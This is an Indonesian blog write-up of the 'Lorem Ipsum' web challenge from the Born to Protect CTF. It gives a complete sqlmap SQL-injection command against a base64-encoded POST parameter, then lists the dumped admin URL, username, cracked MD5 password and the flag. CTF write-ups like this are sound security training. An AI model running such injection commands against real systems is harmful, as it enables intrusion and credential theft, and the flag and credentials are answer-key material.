NextWriteup CTF Born to Protect : Cracked Numbers

Writeup CTF Born to Protect : Lorem Ipsum

Luqman Hakim on May 14, 2018

Writeup CTF Born to Protect : Lorem Ipsum – Diberikan sebuah web lorem ipsum yang mendukung 3 bahasa.

Setelah saya analisa, setiap di pilih salah satu bahasa, maka akan melakukan POST id yang dienkripsi dengan base64 ke data.php

Berdasarkan kategori, maka saya melakukan serangan SQL Injection dengan bantuan SQL Map

sqlmap -u http://35.197.134.203:8013/data.php –data “id=1″ –eval=”id=id.encode(‘base64’)” –level 5 –risk 3 –tables –random-agent –dbms SQLite

Terdapat 3 table

Table config berisi alamat url halaman admin, dan table n1mbusadmin berisi user dan password admin.

Kemudian kami dump satu persatu.

Dan saya menyimpulkan :

Halaman login : http://35.187.236.126:8013/1n1admbr0/
Username : backupuser
Password : a5b6e34b25f4722b811d371e957aea29 > linkinpark

Lalu saya gunakan informasi tersebut untuk login ke halaman admin

Terdapat file flag.

Dan ketika dibuka berisi flag nya

Flag : B2P{af39e6e718f3fb8f2de9ae9e6464b150}

Posted in : Write-ups
Tagged in : Born to Protect, CTF

Posted by Luqman Hakim

I am Luqman Hakim, founder of this blog. I am Software Engineer and IT Security Enthusiast from Indonesia. I spend most of my time in doing programming and playing CTF (Capture the Flag)

All Posts Website

Categories

Tags

Archives

Writeup CTF Born to Protect : Lorem Ipsum

Posted by Luqman Hakim

Related

Leave a Reply Cancel reply

Writeup CTF Born to Protect : Lorem Ipsum

Posted by Luqman Hakim

Related

Share this:

Leave a Reply Cancel reply